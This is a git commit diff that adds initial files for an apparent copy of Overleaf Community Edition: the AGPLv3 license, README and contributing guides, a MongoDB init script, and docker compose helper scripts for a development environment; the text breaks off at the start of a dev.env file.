commit ff9c54d5e4e8fbd83223ea5eac17042ef869fa8b Author: Yu Cong Date: Thu Apr 24 13:11:28 2025 +0800 first commit diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..3b4a832 --- /dev/null +++ b/.gitignore @@ -0,0 +1,9 @@ +# docker image build +.dockerignore + +# user defined files +.env +docker-compose.override.yml +mongo_data/ +redis_data/ +sharelatex_data/ \ No newline at end of file diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md new file mode 100644 index 0000000..5217640 --- /dev/null +++ b/CONTRIBUTING.md @@ -0,0 +1,43 @@ +Contributing to Overleaf +========================== + +Thank you for reading this! If you'd like to report a bug or join in the development +of Overleaf, then here are some notes on how to do that. + +Reporting bugs and opening issues +--------------------------------- + +If you'd like to report a bug or open an issue, please **[check if there is an existing issue](https://github.com/overleaf/overleaf/issues).** +If there is then please add any more information that you have, or give it a 👍. + +When submitting an issue please describe the issue as clearly as possible, including how to +reproduce the bug, which situations it appears in, what you expected to happen, and what actually happens. +If you can include a screenshot for front end issues that is very helpful. + +**Note**: If you are using [www.overleaf.com](www.overleaf.com) and have a problem, or if you would like to request a new feature, please contact the Support team at support@overleaf.com. Raise an issue here only to report bugs in the Community Edition release of Overleaf. + +Pull Requests +------------- + +See [our wiki](https://github.com/overleaf/overleaf/wiki) +for how to manage the Overleaf development environment and for our developer guidelines. + +We love pull requests, so be bold with them! Don't be afraid of going ahead +and changing something, or adding a new feature. We're very happy to work with you +to get your changes merged into Overleaf. + +If you're looking for something to work on, have a look at the [open issues](https://github.com/overleaf/overleaf/issues). + +Security +-------- + +Please see [our security policy](https://github.com/overleaf/overleaf/security/policy) if you would like to report a potential security vulnerability. + +Contributor License Agreement +----------------------------- + +Before we can accept any contributions of code, we need you to agree to our +[Contributor License Agreement](https://docs.google.com/forms/d/e/1FAIpQLSef79XH3mb7yIiMzZw-yALEegS-wyFetvjTiNBfZvf_IHD2KA/viewform?usp=sf_link). +This is to ensure that you own the copyright of your contribution, and that you +agree to give us a license to use it in both the open source version, and the version +of Overleaf running at www.overleaf.com, which may have additional changes. diff --git a/LICENSE b/LICENSE new file mode 100644 index 0000000..dba13ed --- /dev/null +++ b/LICENSE @@ -0,0 +1,661 @@ + GNU AFFERO GENERAL PUBLIC LICENSE + Version 3, 19 November 2007 + + Copyright (C) 2007 Free Software Foundation, Inc. + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The GNU Affero General Public License is a free, copyleft license for +software and other kinds of works, specifically designed to ensure +cooperation with the community in the case of network server software. + + The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. By contrast, +our General Public Licenses are intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + + Developers that use our General Public Licenses protect your rights +with two steps: (1) assert copyright on the software, and (2) offer +you this License which gives you legal permission to copy, distribute +and/or modify the software. + + A secondary benefit of defending all users' freedom is that +improvements made in alternate versions of the program, if they +receive widespread use, become available for other developers to +incorporate. Many developers of free software are heartened and +encouraged by the resulting cooperation. However, in the case of +software used on network servers, this result may fail to come about. +The GNU General Public License permits making a modified version and +letting the public access it on a server without ever releasing its +source code to the public. + + The GNU Affero General Public License is designed specifically to +ensure that, in such cases, the modified source code becomes available +to the community. It requires the operator of a network server to +provide the source code of the modified version running there to the +users of that server. Therefore, public use of a modified version, on +a publicly accessible server, gives the public access to the source +code of the modified version. + + An older license, called the Affero General Public License and +published by Affero, was designed to accomplish similar goals. This is +a different license, not a version of the Affero GPL, but Affero has +released a new version of the Affero GPL which permits relicensing under +this license. + + The precise terms and conditions for copying, distribution and +modification follow. + + TERMS AND CONDITIONS + + 0. Definitions. + + "This License" refers to version 3 of the GNU Affero General Public License. + + "Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. + + "The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + + To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + + A "covered work" means either the unmodified Program or a work based +on the Program. + + To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + + To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. + + An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + + 1. Source Code. + + The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. + + A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. + + The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. + + The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + + The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + + The Corresponding Source for a work in source code form is that +same work. + + 2. Basic Permissions. + + All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + + You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside their relationship with you. + + Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + + 3. Protecting Users' Legal Rights From Anti-Circumvention Law. + + No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such +measures. + + When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + + 4. Conveying Verbatim Copies. + + You may convey verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + + You may charge any price or no price for each copy that you convey, +and you may offer support or warranty protection for a fee. + + 5. Conveying Modified Source Versions. + + You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + + a) The work must carry prominent notices stating that you modified + it, and giving a relevant date. + + b) The work must carry prominent notices stating that it is + released under this License and any conditions added under section + 7. This requirement modifies the requirement in section 4 to + "keep intact all notices". + + c) You must license the entire work, as a whole, under this + License to anyone who comes into possession of a copy. This + License will therefore apply, along with any applicable section 7 + additional terms, to the whole of the work, and all its parts, + regardless of how they are packaged. This License gives no + permission to license the work in any other way, but it does not + invalidate such permission if you have separately received it. + + d) If the work has interactive user interfaces, each must display + Appropriate Legal Notices; however, if the Program has interactive + interfaces that do not display Appropriate Legal Notices, your + work need not make them do so. + + A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + + 6. Conveying Non-Source Forms. + + You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + + a) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by the + Corresponding Source fixed on a durable physical medium + customarily used for software interchange. + + b) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by a + written offer, valid for at least three years and valid for as + long as you offer spare parts or customer support for that product + model, to give anyone who possesses the object code either (1) a + copy of the Corresponding Source for all the software in the + product that is covered by this License, on a durable physical + medium customarily used for software interchange, for a price no + more than your reasonable cost of physically performing this + conveying of source, or (2) access to copy the + Corresponding Source from a network server at no charge. + + c) Convey individual copies of the object code with a copy of the + written offer to provide the Corresponding Source. This + alternative is allowed only occasionally and noncommercially, and + only if you received the object code with such an offer, in accord + with subsection 6b. + + d) Convey the object code by offering access from a designated + place (gratis or for a charge), and offer equivalent access to the + Corresponding Source in the same way through the same place at no + further charge. You need not require recipients to copy the + Corresponding Source along with the object code. If the place to + copy the object code is a network server, the Corresponding Source + may be on a different server (operated by you or a third party) + that supports equivalent copying facilities, provided you maintain + clear directions next to the object code saying where to find the + Corresponding Source. Regardless of what server hosts the + Corresponding Source, you remain obligated to ensure that it is + available for as long as needed to satisfy these requirements. + + e) Convey the object code using peer-to-peer transmission, provided + you inform other peers where the object code and Corresponding + Source of the work are being offered to the general public at no + charge under subsection 6d. + + A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. + + A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + + "Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely because +modification has been made. + + If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + + The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + + Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + + 7. Additional Terms. + + "Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. + + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or + + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or + + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or + + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or + + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or + + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. + + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + + 8. Termination. + + You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. + + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + + 9. Acceptance Not Required for Having Copies. + + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + + 10. Automatic Licensing of Downstream Recipients. + + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + + 11. Patents. + + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. + + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. + + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + + 12. No Surrender of Others' Freedom. + + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + + 13. Remote Network Interaction; Use with the GNU General Public License. + + Notwithstanding any other provision of this License, if you modify the +Program, your modified version must prominently offer all users +interacting with it remotely through a computer network (if your version +supports such interaction) an opportunity to receive the Corresponding +Source of your version by providing access to the Corresponding Source +from a network server at no charge, through some standard or customary +means of facilitating copying of software. This Corresponding Source +shall include the Corresponding Source for any work covered by version 3 +of the GNU General Public License that is incorporated pursuant to the +following paragraph. + + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU General Public License into a single +combined work, and to convey the resulting work. The terms of this +License will continue to apply to the part which is the covered work, +but the work with which it is combined will remain governed by version +3 of the GNU General Public License. + + 14. Revised Versions of this License. + + The Free Software Foundation may publish revised and/or new versions of +the GNU Affero General Public License from time to time. Such new versions +will be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU Affero General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU Affero General Public License, you may choose any version ever published +by the Free Software Foundation. + + If the Program specifies that a proxy can decide which future +versions of the GNU Affero General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + + Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + + 15. Disclaimer of Warranty. + + THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. Limitation of Liability. + + IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. + + 17. Interpretation of Sections 15 and 16. + + If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +state the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + + Copyright (C) + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU Affero General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU Affero General Public License for more details. + + You should have received a copy of the GNU Affero General Public License + along with this program. If not, see . + +Also add information on how to contact you by electronic and paper mail. + + If your software can interact with users remotely through a computer +network, you should also make sure that it provides a way for users to +get its source. For example, if your program is a web application, its +interface could display a "Source" link that leads users to an archive +of the code. There are many ways you could offer source, and different +solutions will be better for different programs; see section 13 for the +specific requirements. + + You should also get your employer (if you work as a programmer) or school, +if any, to sign a "copyright disclaimer" for the program, if necessary. +For more information on this, and how to apply and follow the GNU AGPL, see +. diff --git a/README.md b/README.md new file mode 100644 index 0000000..4895254 --- /dev/null +++ b/README.md @@ -0,0 +1,76 @@ +

+
+ Overleaf +

+ +

An open-source online real-time collaborative LaTeX editor.

+ +

+ Wiki • + Server Pro • + Contributing • + Mailing List • + Authors • + License +

+ +A screenshot of a project being edited in Overleaf Community Edition +

+ Figure 1: A screenshot of a project being edited in Overleaf Community Edition. +

+ +## Community Edition + +[Overleaf](https://www.overleaf.com) is an open-source online real-time collaborative LaTeX editor. We run a hosted version at [www.overleaf.com](https://www.overleaf.com), but you can also run your own local version, and contribute to the development of Overleaf. + +## Enterprise + +If you want help installing and maintaining Overleaf in your lab or workplace, we offer an officially supported version called [Overleaf Server Pro](https://www.overleaf.com/for/enterprises). It also includes more features for security (SSO with LDAP or SAML), administration and collaboration (e.g. tracked changes). [Find out more!](https://www.overleaf.com/for/enterprises) + +## Keeping up to date + +Sign up to the [mailing list](https://mailchi.mp/overleaf.com/community-edition-and-server-pro) to get updates on Overleaf releases and development. + +## Installation + +We have detailed installation instructions in the [Overleaf Toolkit](https://github.com/overleaf/toolkit/). + +## Upgrading + +If you are upgrading from a previous version of Overleaf, please see the [Release Notes section on the Wiki](https://github.com/overleaf/overleaf/wiki#release-notes) for all of the versions between your current version and the version you are upgrading to. + +## Overleaf Docker Image + +This repo contains two dockerfiles, [`Dockerfile-base`](server-ce/Dockerfile-base), which builds the +`sharelatex/sharelatex-base` image, and [`Dockerfile`](server-ce/Dockerfile) which builds the +`sharelatex/sharelatex` (or "community") image. + +The Base image generally contains the basic dependencies like `wget`, plus `texlive`. +We split this out because it's a pretty heavy set of +dependencies, and it's nice to not have to rebuild all of that every time. + +The `sharelatex/sharelatex` image extends the base image and adds the actual Overleaf code +and services. + +Use `make build-base` and `make build-community` from `server-ce/` to build these images. + +We use the [Phusion base-image](https://github.com/phusion/baseimage-docker) +(which is extended by our `base` image) to provide us with a VM-like container +in which to run the Overleaf services. Baseimage uses the `runit` service +manager to manage services, and we add our init-scripts from the `server-ce/runit` +folder. + + +## Contributing + +Please see the [CONTRIBUTING](CONTRIBUTING.md) file for information on contributing to the development of Overleaf. + +## Authors + +[The Overleaf Team](https://www.overleaf.com/about) + +## License + +The code in this repository is released under the GNU AFFERO GENERAL PUBLIC LICENSE, version 3. A copy can be found in the [`LICENSE`](LICENSE) file. + +Copyright (c) Overleaf, 2014-2025. diff --git a/bin/shared/mongodb-init-replica-set.js b/bin/shared/mongodb-init-replica-set.js new file mode 100644 index 0000000..30af660 --- /dev/null +++ b/bin/shared/mongodb-init-replica-set.js @@ -0,0 +1,3 @@ +/* eslint-disable no-undef */ + +rs.initiate({ _id: 'overleaf', members: [{ _id: 0, host: 'mongo:27017' }] }) diff --git a/develop/.gitignore b/develop/.gitignore new file mode 100644 index 0000000..bb5888b --- /dev/null +++ b/develop/.gitignore @@ -0,0 +1,3 @@ +/compiles/* +!.gitkeep +.env \ No newline at end of file diff --git a/develop/README.md b/develop/README.md new file mode 100644 index 0000000..568259c --- /dev/null +++ b/develop/README.md @@ -0,0 +1,89 @@ +# Overleaf Community Edition, development environment + +## Building and running + +In this `develop` directory, build the services: + +```shell +bin/build +``` + +> [!NOTE] +> If Docker is running out of RAM while building the services in parallel, create a `.env` file in this directory containing `COMPOSE_PARALLEL_LIMIT=1`. + +Then start the services: + +```shell +bin/up +``` + +Once the services are running, open to create the first admin account. + +## TeX Live + +Compiling a PDF requires building a TeX Live image to handle the compilation inside Docker: + +```shell +docker build texlive -t texlive-full +``` + +> [!NOTE] +> To compile on a macOS host, you may need to override the path to the Docker socket by creating a `.env` file in this directory, containing +> `DOCKER_SOCKET_PATH=/var/run/docker.sock.raw` + +## Development + +To avoid running `bin/build && bin/up` after every code change, you can run Overleaf +Community Edition in _development mode_, where services will automatically update on code changes. + +To do this, use the included `bin/dev` script: + +```shell +bin/dev +``` + +This will start all services using `nodemon`, which will automatically monitor the code and restart the services as necessary. + +To improve performance, you can start only a subset of the services in development mode by providing a space-separated list to the `bin/dev` script: + +```shell +bin/dev [service1] [service2] ... [serviceN] +``` + +> [!NOTE] +> Starting the `web` service in _development mode_ will only update the `web` +> service when backend code changes. In order to automatically update frontend +> code as well, make sure to start the `webpack` service in _development mode_ +> as well. + +If no services are named, all services will start in development mode. + +## Debugging + +When run in _development mode_ most services expose a debugging port to which +you can attach a debugger such as +[the inspector in Chrome's Dev Tools](chrome://inspect/) or one integrated into +an IDE. The following table shows the port exposed on the **host machine** for +each service: + +| Service | Port | +| ------------------ | ---- | +| `web` | 9229 | +| `clsi` | 9230 | +| `chat` | 9231 | +| `contacts` | 9232 | +| `docstore` | 9233 | +| `document-updater` | 9234 | +| `filestore` | 9235 | +| `notifications` | 9236 | +| `real-time` | 9237 | +| `history-v1` | 9239 | +| `project-history` | 9240 | + +To attach to a service using Chrome's _remote debugging_, go to + and make sure _Discover network targets_ is checked. Next +click _Configure..._ and add an entry `localhost:[service port]` for each of the +services you want to attach a debugger to. + +After adding an entry, the service will show up as a _Remote Target_ that you +can inspect and debug. diff --git a/develop/bin/build b/develop/bin/build new file mode 100755 index 0000000..bd30abc --- /dev/null +++ b/develop/bin/build @@ -0,0 +1,3 @@ +#!/usr/bin/env bash + +docker compose build --pull "$@" diff --git a/develop/bin/dev b/develop/bin/dev new file mode 100755 index 0000000..1dca01c --- /dev/null +++ b/develop/bin/dev @@ -0,0 +1,3 @@ +#!/usr/bin/env bash + +docker-compose -f docker-compose.yml -f docker-compose.dev.yml up --no-deps --detach "$@" diff --git a/develop/bin/down b/develop/bin/down new file mode 100755 index 0000000..3eaad36 --- /dev/null +++ b/develop/bin/down @@ -0,0 +1,3 @@ +#!/usr/bin/env bash + +docker compose down "$@" diff --git a/develop/bin/logs b/develop/bin/logs new file mode 100755 index 0000000..3288ec0 --- /dev/null +++ b/develop/bin/logs @@ -0,0 +1,9 @@ +#!/usr/bin/env bash + +docker compose logs --follow --tail 10 --no-color "$@" \ + | ggrep --line-buffered --invert-match "global.gc" \ + | ggrep --line-buffered --invert-match "health.check" \ + | ggrep --line-buffered --invert-match "slow event loop" \ + | ggrep --line-buffered --invert-match "process.memoryUsage" \ + | ggrep --line-buffered --only-matching "[{].*" \ + | bunyan --output short diff --git a/develop/bin/shell b/develop/bin/shell new file mode 100755 index 0000000..0929c51 --- /dev/null +++ b/develop/bin/shell @@ -0,0 +1,3 @@ +#!/usr/bin/env bash + +docker compose exec -it "$@" /bin/bash diff --git a/develop/bin/up b/develop/bin/up new file mode 100755 index 0000000..b39c4e3 --- /dev/null +++ b/develop/bin/up @@ -0,0 +1,3 @@ +#!/usr/bin/env bash + +docker compose up --detach "$@" diff --git a/develop/compiles/.gitkeep b/develop/compiles/.gitkeep new file mode 100644 index 0000000..e69de29 diff --git a/develop/dev.env b/develop/dev.env new file mode 100644 index 0000000..aae9149 